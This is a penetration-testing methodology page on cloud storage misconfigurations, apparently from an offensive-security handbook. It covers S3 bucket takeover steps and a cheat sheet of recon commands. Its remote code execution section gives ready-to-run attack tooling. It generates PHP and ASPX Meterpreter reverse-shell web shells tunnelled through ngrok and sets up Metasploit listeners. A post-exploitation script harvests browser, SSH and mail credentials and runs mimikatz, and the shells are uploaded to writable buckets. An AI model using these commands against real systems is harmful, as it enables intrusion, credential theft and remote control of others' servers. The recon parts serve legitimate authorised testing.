Cloud Storage

Check List

Assess that the access control configuration for the storage services is properly in place.

Methodology

Cloud Storage (AWS S3)

Go to AWS S3 console Create a new bucket with the exact name matching the vulnerable/unclaimed bucket

Complete the bucket creation process Upload a proof-of-concept file (HTML or TXT file) Set the uploaded file’s permissions to public read

Add proper metadata (Content-Type: text/html if HTML file) (Optional) Enable static website hosting on the bucket and set the uploaded file as the index document The attacker now controls the bucket and can serve malicious content

Cloud Storage (S3)

So I get all the alive subdomains use Subdomain Enum Command in cheat sheet

So I put every single alive domain in browser let call it Target example https://$WEBSITE/ so after this I put /%C0 → say https://$WEBSITE/%C0

.And I notice that it give me an cloudflare error like this InvalidURI Couldn’t parse the specified URI/%C0 So I just append the target domain with .s3.amazonaws.com https://$WEBSITE.s3.amazonaws.com/

And I get the bucket name. Some time it says no such bucket. So in that case what I do I just run dig on that Command

So it gives _CNAME of pointed (http://$WEBSITE) so I am thinking what to do with this. So I read this article But unluckily on CRUD operation I get access denied and use .aws s3 Commands And in response I have foun PRE Server/

Cheat Sheet

WHOIS Lookup

Host

Domain to IP

host $WEBSITE

Whois

Company Info

whois $WEBSITE

IP to ASN

whois -h whois.cymru.com -v $TARGET

cURL

HTTP Headers

curl -I $WEBSITE

Check Robots

curl $WEBSITE/robots.txt

DNS Enum

DNSEnum

DNS Records

dnsenum $WEBSITE

Dig

dig +short $WEBSITE

Subdomain Enum

SubFinder & ShuffleDNS

Subdomains

echo "1.1.1.1" > /tmp/resolvers.txt; \
subfinder -d $WEBSITE -all | \
shuffledns -d $WEBSITE -r /tmp/resolvers.txt -mode resolve

Source URLs

Katana

GCP

katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+storage\.googleapis\.com[^ ]*"

AWS

katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+s3[^ ]+\.amazonaws\.com"

Azure

katana -u $WEBSITE -jc -d 5 | grep -Eo "https?://[^ ]+s3[^ ]+\.blob.core.windows\.net"

Certificate Transparency

Cert.sh

curl -s "https://crt.sh/?q=%25.$WEBSITE&output=json" | jq .

Wayback Machine

GCP

echo $WEBSITE | gau | grep -E "storage\.googleapis\.com|.*\.storage.googleapis.com"

AWS

echo $WEBSITE | gau | grep -E "s3\.[a-z0-9-]+\.amazonaws\.com|s3\.amazonaws\.com"

Azure

echo $WEBSITE | gau | grep -E "s3\.[a-z0-9-]+\.blob.core.windows\.net|s3\.blob.core.windows\.net"

Nmap

GCP

nmap -p 80,443 \
     --script http-title,http-headers $BUCKET.storage.googleapis.com

AWS

nmap -p 80,443 \
     --script http-title,s3open $BUCKET.s3.amazonaws.com

Azure

nmap -p 80,443 \
     --script http-title,azure-enum $CONTAINER.blob.core.windows.net

Nuclei

nuclei -u $WEBSITE \
       -tags aws gcp azure cloud cloud-Enum aws-cloud-config azure-cloud-config

Open Source Intelligence

Google

GCP

site:$WEBSITE inurl:"storage.googleapis.com" | 
site:$WEBSITE inurl:"googleusercontent.com"

AWS

site:$WEBSITE inurl:"amazonaws.com" | 
site:s3.amazonaws.com $WEBSITE

Azure

site:$WEBSITE inurl:"blob.core.windows.com" | 
site:blob.core.windows.com $WEBSITE

Shodan

shodan search net:"$TARGET/24"

Censys

services.http.response.body: {"s3.amazonaws.com", "storage.googleapis.com", "blob.core.windows.net"}

CloudBrute

GCP

wget https://raw.githubusercontent.com/RhinoSecurityLabs/GCPBucketBrute/refs/heads/master/permutations.txt \
    -O /tmp/gcp_buckets.txt
cloudbrute discover \
    -d $WEBSITE \
    -k "gcp" \
    -w /tmp/gcp_buckets.txt

AWS

wget https://raw.githubusercontent.com/koaj/aws-s3-bucket-wordlist/refs/heads/master/list.txt \
    -O /tmp/s3_bucket_list.txt
cloudbrute discover \
    -d $WEBSITE \
    -k "s3" \
    -w /tmp/s3_bucket_list.txt

Azure

wget https://raw.githubusercontent.com/Macmod/goblob/refs/heads/main/wordlists/goblob-folder-names.txt \
    -O /tmp/AzureBlob.txt
cloudbrute discover \
    -d $WEBSITE \
    -k "azure" \
    -w /tmp/AzureBlob.txt

Nmap

nmap -p 80,443 \
     --script http-title,http-open-proxy,ssl-cert,http-enum,http-robots.txt,http-auth-finder,s3-buckets,s3-ls,s3-object,s3-enum,s3-brute \
     $CONTAINER.blob.core.windows.net \
     $BUCKET.storage.googleapis.com \
     $BUCKET.s3.amazonaws.com

Remote Code Execution

Weevely

Create Web Shell PHP

weevely generate 00980098 /tmp/unk9vvn.php

Create Web Shell ASPX

cp /usr/share/webshells/aspx/cmdasp.aspx /tmp/unk9vvn.aspx

Metasploit

Start Ngrok

ngrok tcp 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGINFO=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels); \
NGHOST=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/([^"]*):.*/\1/p'); \
NGPORT=$(echo "$NGINFO" | sed -nE 's/.*public_url":"tcp:\/\/.*.tcp.*.ngrok.io:([^"]*).*/\1/p')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

Generate Web shell PHP

msfvenom -p php/meterpreter/reverse_tcp \
         LHOST=$NGHOST \
         PORT=$NGPORT \
         EnableStageEncoding=true \
         -f raw \
         -e php/base64 \
         -i 3 \
         -o /tmp/unk9vvn.php
sed -i "s#eval#<?php eval#g" /tmp/unk9vvn.php
sed -i "s#));#)); ?>#g" /tmp/unk9vvn.php

Generate Web Shell ASP

msfvenom -p windows/meterpreter/reverse_winhttps \
         LHOST=$NGHOST \
         PORT=$NGPORT \
         EnableStageEncoding=true \
         -f asp > /tmp/unk9vvn.aspx

Listening Metasploit PHP

msfconsole -qx "
    use multi/handler;
    set PAYLOAD php/meterpreter/reverse_tcp;
    set LHOST $NGHOST;
    set LPORT $NGPORT;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Listening Metaploit ASP

msfconsole -qx "
    use multi/handler;
    set PAYLOAD windows/meterpreter/reverse_winhttps;
    set LHOST $NGHOST;
    set LPORT $NGPORT;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

AWS S3

Connection Test

aws s3 ls s3://$BUCKET.s3.amazonaws.com --no-sign-request

Upload File Testing

aws s3 cp /tmp/unk9vvn.php s3://$BUCKET.s3.amazonaws.com --no-sign-request

Success Upload File Testing

aws s3 cp s3://$BUCKET.s3.amazonaws.com/unk9vvn.php . --no-sign-request

HTTP Connection Testing

curl -I https://$BUCKET.s3.amazonaws.com/unk9vvn.php

GCP

Connection Test

gsutil ls gs://$BUCKET

Upload File Testing

gsutil cp /tmp/unk9vvn.php gs://$BUCKET

Success Upload File Testing

gsutil cp gs://$BUCKET/unk9vvn.php .

HTTP Connection Testing

curl -I http://storage.googleapis.com/$BUCKET/unk9vvn.php

Azure

Connection Test

az storage blob list \
    --account-name $ACCOUNT \
    --container-name $CONTAINER \
    --output table

Upload File Testing

az storage blob upload \
    --account-name $ACCOUNT \
    --container-name $CONTAINER \
    --name unk9vvn.aspx \
    --file /tmp/unk9vvn.aspx \
    --auth-mode login

Success Upload File Testing

az storage blob download 
    --account-name $ACCOUNT \
    --container-name $CONTAINER \
    --name unk9vvn.aspx \
    --file /tmp/test_unk9vvn.aspx \
    --auth-mode login

HTTP Connection Testing

curl -I https://$ACCOUNT.blob.core.windows.net/$CONTAINER/unk9vvn.aspx

PreviousSubdomain Takeover NextContent Security Policy

Last updated 1 month ago